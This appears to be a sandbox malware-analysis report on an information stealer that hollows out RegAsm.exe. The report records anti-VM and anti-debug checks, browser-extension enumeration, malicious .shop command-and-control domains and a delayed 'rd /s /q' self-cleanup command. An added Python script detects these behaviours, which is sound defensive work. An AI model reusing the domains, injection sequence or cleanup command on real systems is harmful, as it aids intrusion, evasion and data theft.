Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 12_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_0041391C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040EA64 GetSystemInfo,wsprintfA, 2_2_0040EA64
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KKJEBAAECB.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KJKJJJECFI.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Amcache.hve.19.dr Binary or memory string: VMware
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr Binary or memory string: VMware20,1hbin@
Source: RegAsm.exe, 00000009.00000002.2376623871.0000000001025000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW("
Source: Amcache.hve.19.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: Amcache.hve.19.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043C800 LdrInitializeThunk, 9_2_0043C800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0041616A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415E38 mov eax, dword ptr fs:[00000030h] 2_2_00415E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B042 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,memset, 2_2_0040B042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041C8F8 SetUnhandledExceptionFilter, 2_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6C0FB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C0FB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C2AAC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\KKJEBAAECB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\KJKJJJECFI.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02C12481 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_02C12481
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: awwardwiqi.shop
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_0040FE05
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C0008
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD1008
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1194008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
Source: C:\ProgramData\KKJEBAAECB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KKJEBAAECB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KJKJJJECFI.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
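The entries above are the whole injection story in three kinds of event: the API chain CreateProcessA, Wow64GetThreadContext, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread recorded in file.exe (process hollowing, here without the optional unmap of the host image), an RWX allocation at base 400000 inside the freshly spawned RegAsm.exe followed by a write whose first bytes are 4D5A (an MZ header landing on the host's image base), and finally the cmd.exe /c timeout /t 10 & rd /s /q cleanup that waits for the parent to exit before deleting its staging folder. The Python below is an added example, not part of this report or of the sandbox that produced it. It runs that triage over constructed event lines that copy the report's paths, addresses and API chain (the one-line-per-event layout is an assumption), flags an ordered hollowing chain, correlates MZ writes into a foreign process with RWX allocations by the same injector into the same target, and flags the delayed self-cleanup command.

```python
import re
from collections import defaultdict

# Constructed sandbox-style event lines. Paths, addresses and the API chain are copied
# from the entries in this report; the one-line-per-event layout is an assumption.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02C12481 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_02C12481",
    r"Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\ProgramData\KKJEBAAECB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\ProgramData\KKJEBAAECB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A",
    # MZ write with no RWX allocation line in the same capture: still a PE in a foreign process
    r"Source: C:\ProgramData\KJKJJJECFI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A",
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit',
    # Benign control (constructed): a read-only foreign allocation and no MZ write
    r"Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\notepad.exe base: 7FF000 protect: page read only",
]

CODE_FN = re.compile(r"^Source: (?P<src>.+?) Code function: (?P<id>\S+) (?P<apis>\S+) (?P=id)$")
MEM_ALLOC = re.compile(r"^Source: (?P<src>.+?) Memory allocated: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
MEM_WRITE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)$")
PROC_CREATED = re.compile(r"^Source: (?P<src>.+?) Process created: (?P<image>\S+) (?P<cmdline>.+)$")
# "timeout /t N & rd /s /q <dir>": wait for the parent to exit, then remove its staging folder
CLEANUP_RE = re.compile(r"timeout\s+/t\s+\d+\s*&\s*rd\s+/s\s+/q", re.IGNORECASE)

# Ordered steps of process hollowing. Unmapping the host image (NtUnmapViewOfSection) is
# optional and absent from this sample's chain, so it is not required here.
HOLLOW_STEPS = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread", "NtResumeThread"},
]


def is_hollowing_chain(apis):
    """True if the call list contains every hollowing step in order (other calls may interleave)."""
    step = 0
    for api in apis:
        if step < len(HOLLOW_STEPS) and api in HOLLOW_STEPS[step]:
            step += 1
    return step == len(HOLLOW_STEPS)


def triage(lines):
    """Return (kind, source_process, detail) findings for a list of sandbox event lines."""
    findings = []
    rwx_allocs = defaultdict(set)   # (injector, target) -> bases allocated RWX in the target
    pe_writes = defaultdict(set)    # (injector, target) -> bases where an MZ header was written
    for raw in lines:
        line = raw.strip()
        if m := CODE_FN.match(line):
            apis = [a for a in m["apis"].split(",") if a]
            if is_hollowing_chain(apis):
                findings.append(("process_hollowing_chain", m["src"], m["id"]))
        elif m := MEM_ALLOC.match(line):
            prot = m["prot"].lower()
            if m["src"] != m["dst"] and "execute" in prot and "write" in prot:
                rwx_allocs[(m["src"], m["dst"])].add(int(m["base"], 16))
        elif m := MEM_WRITE.match(line):
            if m["src"] != m["dst"] and m["magic"].upper().startswith("4D5A"):
                pe_writes[(m["src"], m["dst"])].add(int(m["base"], 16))
        elif (m := PROC_CREATED.match(line)) and CLEANUP_RE.search(m["cmdline"]):
            findings.append(("delayed_self_cleanup", m["src"], m["cmdline"]))
    # An MZ header written on top of a region the same injector made RWX in the same target
    # is the strongest signal; an MZ write alone is still worth a finding.
    for (src, dst), bases in pe_writes.items():
        for base in sorted(bases):
            kind = ("pe_written_to_rwx_foreign_region" if base in rwx_allocs[(src, dst)]
                    else "pe_written_to_foreign_process")
            findings.append((kind, src, f"{dst} @ {base:#x}"))
    return findings


if __name__ == "__main__":
    for kind, src, detail in triage(SAMPLE_EVENTS):
        print(f"{kind:34} {src} -> {detail}")
```

Matching on an ordered subsequence rather than an exact list is deliberate: the report's own chain has VirtualAlloc and ReadProcessMemory interleaved and three WriteProcessMemory calls, and a sample compiled for 64-bit would use the non-Wow64 context functions, so each step is a set of equivalents. The same per-(injector, target) correlation works on Sysmon event 10 (process access) and event 8 (remote thread) data, or on any EDR that exposes the protection of cross-process allocations.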
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 2_2_6C2F4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401000 cpuid 2_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_0040E910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\KKJEBAAECB.exe Queries volume information: C:\ProgramData\KKJEBAAECB.exe VolumeInformation
Source: C:\ProgramData\KJKJJJECFI.exe Queries volume information: C:\ProgramData\KJKJJJECFI.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040E863 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 2_2_0040E863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040E7F6 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_0040E7F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040E8BD GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_0040E8BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.19.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
